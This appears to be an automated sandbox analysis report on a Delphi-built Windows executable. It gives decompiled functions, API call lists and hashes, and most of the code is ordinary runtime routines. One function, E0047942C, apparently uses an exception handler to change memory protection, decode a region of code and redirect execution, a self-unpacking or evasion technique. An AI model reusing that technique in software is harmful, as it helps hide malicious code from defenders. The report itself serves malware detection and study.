                                                                        • Opcode ID: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction ID: 54e94ae64045f866c9d0fd814db0631e9b26727ee0c17caded26134f85bec22f
                                                                        • Opcode Fuzzy Hash: 6f8d4d31483a260ff14e10f917ad7f427b490c81166326aeb79ff36f3aed0e0f
                                                                        • Instruction Fuzzy Hash: A7316A30604244ABDB50FBA5DC42B9633E5AB44308F5580B7BD4CDF2A7DE78994EC729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E00453F78(char __edx, void* __edi) {
                                                                        				char _v5;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t25;
                                                                        				intOrPtr* _t28;
                                                                        				intOrPtr* _t29;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr* _t45;
                                                                        				intOrPtr _t56;
                                                                        				intOrPtr _t57;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr _t62;
                                                                        				void* _t63;
                                                                        				char _t64;
                                                                        				void* _t74;
                                                                        				intOrPtr _t75;
                                                                        				void* _t76;
                                                                        				void* _t77;
                                                                        
                                                                        				_t74 = __edi;
                                                                        				_t64 = __edx;
                                                                        				if(__edx != 0) {
                                                                        					_t77 = _t77 + 0xfffffff0;
                                                                        					_t25 = E00403940(_t25, _t76);
                                                                        				}
                                                                        				_v5 = _t64;
                                                                        				_t62 = _t25;
                                                                        				E0041C1DC(_t63, 0);
                                                                        				_t28 =  *0x49591c; // 0x47a458
                                                                        				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                                                        				 *_t28 = 0x45431c;
                                                                        				_t29 =  *0x495928; // 0x47a460
                                                                        				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                                                        				 *_t29 = 0x454328;
                                                                        				E00454334(_t62);
                                                                        				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                                                        				 *((intOrPtr*)(_t62 + 0x4c)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t62 + 0x50)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t62 + 0x54)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t62 + 0x58)) = E004035AC(1);
                                                                        				_t42 = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                                                        				L00406EB4();
                                                                        				_t75 = _t42;
                                                                        				L00406B8C();
                                                                        				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                                                        				L00407124();
                                                                        				_t11 = _t62 + 0x58; // 0x44d3f86e
                                                                        				_t45 =  *0x495a58; // 0x496ab8
                                                                        				 *((intOrPtr*)( *_t45))(0, 0, E004507FC,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                                                        				 *((intOrPtr*)(_t62 + 0x84)) = E0041F290(1);
                                                                        				 *((intOrPtr*)(_t62 + 0x88)) = E0041F290(1);
                                                                        				 *((intOrPtr*)(_t62 + 0x80)) = E0041F290(1);
                                                                        				E00454754(_t62, _t62, _t63, _t74);
                                                                        				_t15 = _t62 + 0x84; // 0x38004010
                                                                        				_t56 =  *_t15;
                                                                        				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                                                        				 *((intOrPtr*)(_t56 + 8)) = 0x454630;
                                                                        				_t18 = _t62 + 0x88; // 0x90000000
                                                                        				_t57 =  *_t18;
                                                                        				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                                                        				 *((intOrPtr*)(_t57 + 8)) = 0x454630;
                                                                        				_t21 = _t62 + 0x80; // 0xac000000
                                                                        				_t58 =  *_t21;
                                                                        				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                                                        				 *((intOrPtr*)(_t58 + 8)) = 0x454630;
                                                                        				_t59 = _t62;
                                                                        				if(_v5 != 0) {
                                                                        					E00403998(_t59);
                                                                        					_pop( *[fs:0x0]);
                                                                        				}
                                                                        				return _t62;
                                                                        			}
























                                                                        APIs
                                                                        • GetKeyboardLayout.USER32 ref: 00453FBD
                                                                        • 72E7AC50.USER32(00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00454012
                                                                        • 72E7AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 0045401C
                                                                        • 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?), ref: 00454027
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: B380KeyboardLayout
                                                                        • String ID:
                                                                        • API String ID: 648844651-0
                                                                        • Opcode ID: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction ID: b3b2c94ae3b9948f2a134b370cea85584a5ef29b9b8697dbbfd7147a4e89023a
                                                                        • Opcode Fuzzy Hash: 7cd0441e299d4dd76d954c66a31d9b821428746ca5e7d7290b214efdd2fa17c6
                                                                        • Instruction Fuzzy Hash: 873109B06112409FD740EF2ADCC1B857BE4AB05319F0490BAED08CF3A7DB7A9849DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00401AA0() {
                                                                        				void* _t11;
                                                                        				signed int _t13;
                                                                        				intOrPtr _t19;
                                                                        				void* _t20;
                                                                        				intOrPtr _t23;
                                                                        
                                                                        				_push(_t23);
                                                                        				_push(E00401B56);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t23;
                                                                        				_push(0x4965c4);
                                                                        				L004013F4();
                                                                        				if( *0x496049 != 0) {
                                                                        					_push(0x4965c4);
                                                                        					L004013FC();
                                                                        				}
                                                                        				E00401464(0x4965e4);
                                                                        				E00401464(0x4965f4);
                                                                        				E00401464(0x496620);
                                                                        				_t11 = LocalAlloc(0, 0xff8); // executed
                                                                        				 *0x49661c = _t11;
                                                                        				if( *0x49661c != 0) {
                                                                        					_t13 = 3;
                                                                        					do {
                                                                        						_t20 =  *0x49661c; // 0x69cc50
                                                                        						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
                                                                        						_t13 = _t13 + 1;
                                                                        					} while (_t13 != 0x401);
                                                                        					 *((intOrPtr*)(0x496608)) = 0x496604;
                                                                        					 *0x496604 = 0x496604;
                                                                        					 *0x496610 = 0x496604;
                                                                        					 *0x4965bc = 1;
                                                                        				}
                                                                        				_pop(_t19);
                                                                        				 *[fs:eax] = _t19;
                                                                        				_push(E00401B5D);
                                                                        				if( *0x496049 != 0) {
                                                                        					_push(0x4965c4);
                                                                        					L00401404();
                                                                        					return 0;
                                                                        				}
                                                                        				return 0;
                                                                        			}









                                                                        APIs
                                                                        • RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                        • LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                        • String ID:
                                                                        • API String ID: 730355536-0
                                                                        • Opcode ID: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction ID: e3fa4044cabce3705ee1953a6e939e98ba2ac419389a6aed450bfef70ff098bf
                                                                        • Opcode Fuzzy Hash: 4b702e9c7921f94c24e7c027581dd264e32c8e6686b16004a7e4da62ebbcb975
                                                                        • Instruction Fuzzy Hash: 440180B0644240AEEB26AB6AA806B197FE5D755718F07803FE000A66F2DBBD5C45CF1D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00427300(int _a4) {
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				signed int _t2;
                                                                        				signed int _t3;
                                                                        				void* _t7;
                                                                        				int _t8;
                                                                        				void* _t12;
                                                                        				void* _t13;
                                                                        				void* _t17;
                                                                        				void* _t18;
                                                                        
                                                                        				_t8 = _a4;
                                                                        				if( *0x496ac4 == 0) {
                                                                        					 *0x496a9c = E00427218(0, _t8,  *0x496a9c, _t17, _t18);
                                                                        					_t7 =  *0x496a9c(_t8); // executed
                                                                        					return _t7;
                                                                        				}
                                                                        				_t3 = _t2 | 0xffffffff;
                                                                        				_t12 = _t8 + 0xffffffb4 - 2;
                                                                        				__eflags = _t12;
                                                                        				if(__eflags < 0) {
                                                                        					_t3 = 0;
                                                                        				} else {
                                                                        					if(__eflags == 0) {
                                                                        						_t8 = 0;
                                                                        					} else {
                                                                        						_t13 = _t12 - 1;
                                                                        						__eflags = _t13;
                                                                        						if(_t13 == 0) {
                                                                        							_t8 = 1;
                                                                        						} else {
                                                                        							__eflags = _t13 - 0xffffffffffffffff;
                                                                        							if(_t13 - 0xffffffffffffffff < 0) {
                                                                        								_t3 = 1;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				__eflags = _t3 - 0xffffffff;
                                                                        				if(_t3 != 0xffffffff) {
                                                                        					return _t3;
                                                                        				} else {
                                                                        					return GetSystemMetrics(_t8);
                                                                        				}
                                                                        			}














                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 00427362
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        • KiUserCallbackDispatcher.NTDLL ref: 00427328
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                        • String ID: GetSystemMetrics
                                                                        • API String ID: 54681038-96882338
                                                                        • Opcode ID: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction ID: 5b839be3fabe59c0cd91bf616db641c7d3104d278b4c8a76039aace42cce4069
                                                                        • Opcode Fuzzy Hash: 55446e7e76123103b454da646c455967d357e49010d04799ca10e5a3ca25f6d8
                                                                        • Instruction Fuzzy Hash: CBF0623171C6124AC610CA74BC855263546A75A374FE88733ED16966E1C23D9845E25D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00401AA0: RtlInitializeCriticalSection.KERNEL32(004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AB6
                                                                          • Part of subcall function 00401AA0: RtlEnterCriticalSection.KERNEL32(004965C4,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AC9
                                                                          • Part of subcall function 00401AA0: LocalAlloc.KERNEL32(00000000,00000FF8,004965C4,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401AF3
                                                                          • Part of subcall function 00401AA0: RtlLeaveCriticalSection.KERNEL32(004965C4,00401B5D,00000000,00401B56,?,?,0040233A,021514A0,?,00000000,?,?,00401D29,00401D3E,00401E8F), ref: 00401B50
                                                                        • RtlEnterCriticalSection.KERNEL32(004965C4,00000000,00402308), ref: 004021D7
                                                                        • RtlLeaveCriticalSection.KERNEL32(004965C4,0040230F), ref: 00402302
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                        • String ID:
                                                                        • API String ID: 2227675388-0
                                                                        • Opcode ID: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction ID: 83bdff73d5a1a07a892888f5c36523991864ad6eb74594df81dd07f85809d88a
                                                                        • Opcode Fuzzy Hash: 35d58ee3540cf062b3df7ea74c26ca495e5eebe2a6b1ad0ad556c1b196560d5d
                                                                        • Instruction Fuzzy Hash: B941EEB2A006009FD714CF69EE85629B7A4EB65328B27427FD801E77E1E67C9C418B1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00454334(void* __eax) {
                                                                        				struct HICON__* _t5;
                                                                        				void* _t7;
                                                                        				void* _t8;
                                                                        				struct HINSTANCE__* _t11;
                                                                        				CHAR** _t12;
                                                                        				void* _t13;
                                                                        
                                                                        				_t13 = __eax;
                                                                        				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                                        				_t8 = 0xffffffea;
                                                                        				_t12 = 0x47ab90;
                                                                        				do {
                                                                        					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
                                                                        						if(_t8 != 0xffffffeb) {
                                                                        							_t11 = 0;
                                                                        						} else {
                                                                        							goto L4;
                                                                        						}
                                                                        					} else {
                                                                        						L4:
                                                                        						_t11 =  *0x496714; // 0x400000
                                                                        					}
                                                                        					_t5 = LoadCursorA(_t11,  *_t12); // executed
                                                                        					_t7 = E004543EC(_t13, _t5, _t8);
                                                                        					_t8 = _t8 + 1;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t8 != 0xffffffff);
                                                                        				return _t7;
                                                                        			}










                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CursorLoad
                                                                        • String ID:
                                                                        • API String ID: 3238433803-0
                                                                        • Opcode ID: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction ID: 45ff5c45349f62151306836f9853a517dcd13b5311b8dd786089dfbce635c089
                                                                        • Opcode Fuzzy Hash: d761e11c61c979bdf821915641afd05efaccb41e9284a7765425020a359a9d55
                                                                        • Instruction Fuzzy Hash: 51F0E911B00241479A50557D4CC096E3254DBC273DB210377FE79CE2F2C62D2C858159
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004015B8(void* __eax, void** __edx) {
                                                                        				void* _t3;
                                                                        				void** _t8;
                                                                        				void* _t11;
                                                                        				long _t14;
                                                                        
                                                                        				_t8 = __edx;
                                                                        				if(__eax >= 0x100000) {
                                                                        					_t14 = __eax + 0x0000ffff & 0xffff0000;
                                                                        				} else {
                                                                        					_t14 = 0x100000;
                                                                        				}
                                                                        				_t8[1] = _t14;
                                                                        				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                                                                        				_t11 = _t3;
                                                                        				 *_t8 = _t11;
                                                                        				if(_t11 != 0) {
                                                                        					_t3 = E0040146C(0x4965e4, _t8);
                                                                        					if(_t3 == 0) {
                                                                        						VirtualFree( *_t8, 0, 0x8000);
                                                                        						 *_t8 = 0;
                                                                        						return 0;
                                                                        					}
                                                                        				}
                                                                        				return _t3;
                                                                        			}








                                                                        APIs
                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018C1), ref: 004015E7
                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018C1), ref: 0040160E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Virtual$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2087232378-0
                                                                        • Opcode ID: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction ID: 904b9d4922f68113b59492f8b44d46dc7ec4cb2fb37737401e8004d19412cf8b
                                                                        • Opcode Fuzzy Hash: 9e2649f51290d73c37372646d6b2be47bcd4918fbfb34046e085b880d4026c3a
                                                                        • Instruction Fuzzy Hash: 88F0E272B003202BEB205A6A0CC1B536AC49B857A4F190477B948FF3E9D67A8C0082A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0047942C(void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
                                                                        				long _v8;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				signed int _t22;
                                                                        				signed int _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t31 = _a4;
                                                                        				if(E0047940C( *((intOrPtr*)( *_t31))) == 0) {
                                                                        					if(E00479418( *((intOrPtr*)( *_t31))) == 0) {
                                                                        						return 0;
                                                                        					}
                                                                        					 *((intOrPtr*)( *(_t31 + 4) + 0xb8)) = 0x479404;
                                                                        					return 0xffffffffffffffff;
                                                                        				}
                                                                        				_t22 =  *(_t31 + 4);
                                                                        				if(( *(_t22 + 0xa8) ^ 0x000ba895) != 0x9a1e0) {
                                                                        					return 0;
                                                                        				}
                                                                        				VirtualProtectEx(0xffffffff,  *(_t22 + 0xa0), 0x1415a, 4,  &_v8); // executed
                                                                        				E0047951C(_t31,  *((intOrPtr*)( *(_t31 + 4) + 0xa0)), 0x1415a, __edi, __esi, 0x1aa6f, 0x47ade0);
                                                                        				_t29 =  *(_t31 + 4);
                                                                        				 *((intOrPtr*)(_t29 + 0xb8)) =  *((intOrPtr*)(_t29 + 0xb8)) + 0x62f5;
                                                                        				return _t29 | 0xffffffff;
                                                                        			}










                                                                        APIs
                                                                        • VirtualProtectEx.KERNEL32(000000FF,?,0001415A,00000004,?), ref: 0047946C
                                                                          • Part of subcall function 0047951C: GetKeyboardType.USER32(00000000), ref: 0047958B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: KeyboardProtectTypeVirtual
                                                                        • String ID:
                                                                        • API String ID: 687961724-0
                                                                        • Opcode ID: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction ID: fc2a89276082dc8536020b565f8470d0cf6bf16a89c644c3f15dbdb255ca1576
                                                                        • Opcode Fuzzy Hash: a14af51c247e0b399cf11fe92d5a90e969ef7e6e005634e7367ce840528c0a59
                                                                        • Instruction Fuzzy Hash: 64113031248200AFCB50DB15C981EE573A5EB46364F64C7A6E92C5F396D634EC46CB2A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040733E(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                        				struct HWND__* _t10;
                                                                        
                                                                        				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                        				return _t10;
                                                                        			}





                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction ID: 3ae3b0bb6aa290208680c541b8da8ad6351dd4405c79d6abd1241d14a227bfc1
                                                                        • Opcode Fuzzy Hash: 80272dabcd13070f2b0510fd908a943113dc0608c8ac620f3197796e7cfed276
                                                                        • Instruction Fuzzy Hash: A7E002B2204309BFEB00DE8ADCC1DABB7ACFB4C654F854115BB1C97242D275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00407340(CHAR* __eax, long __ecx, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
                                                                        				struct HWND__* _t10;
                                                                        
                                                                        				_t10 = CreateWindowExA(0, __eax, __edx, __ecx, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
                                                                        				return _t10;
                                                                        			}





                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateWindow
                                                                        • String ID:
                                                                        • API String ID: 716092398-0
                                                                        • Opcode ID: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction ID: 109ed22ea2e506524b14edc0d0bd377e8b92066772ad28182da1425e8690dcbf
                                                                        • Opcode Fuzzy Hash: f8749ca0a26f364fac6116af4e158c42e39b8565b85338519646d0319e4c55ad
                                                                        • Instruction Fuzzy Hash: F7E002B2204309BFDB00DE8ADCC1DABB7ACFB4C654F854105BB1C972429275AD608B71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405A64(void* __eax) {
                                                                        				char _v272;
                                                                        				intOrPtr _t14;
                                                                        				void* _t16;
                                                                        				intOrPtr _t18;
                                                                        				intOrPtr _t19;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                                                                        					_t3 = _t16 + 4; // 0x400000
                                                                        					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                                                                        					_t14 = E00405CA0(_t19); // executed
                                                                        					_t18 = _t14;
                                                                        					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                                                                        					if(_t18 == 0) {
                                                                        						_t5 = _t16 + 4; // 0x400000
                                                                        						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                                                                        					}
                                                                        				}
                                                                        				_t7 = _t16 + 0x10; // 0x400000
                                                                        				return  *_t7;
                                                                        			}









                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?,00000400,?,004104D0,004141B7,00000000,004141DC), ref: 00405A82
                                                                          • Part of subcall function 00405CA0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001,004104D0,00405ACC,00406578,0000FF99,?), ref: 00405CBC
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C,?,00405A90,00400000,?,00000105,00000001), ref: 00405CDA
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0047A08C), ref: 00405CF8
                                                                          • Part of subcall function 00405CA0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405D16
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405D5F
                                                                          • Part of subcall function 00405CA0: RegQueryValueExA.ADVAPI32(?,00405F0C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405DA5,?,80000001), ref: 00405D7D
                                                                          • Part of subcall function 00405CA0: RegCloseKey.ADVAPI32(?,00405DAC,00000000,00000000,00000005,00000000,00405DA5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405D9F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
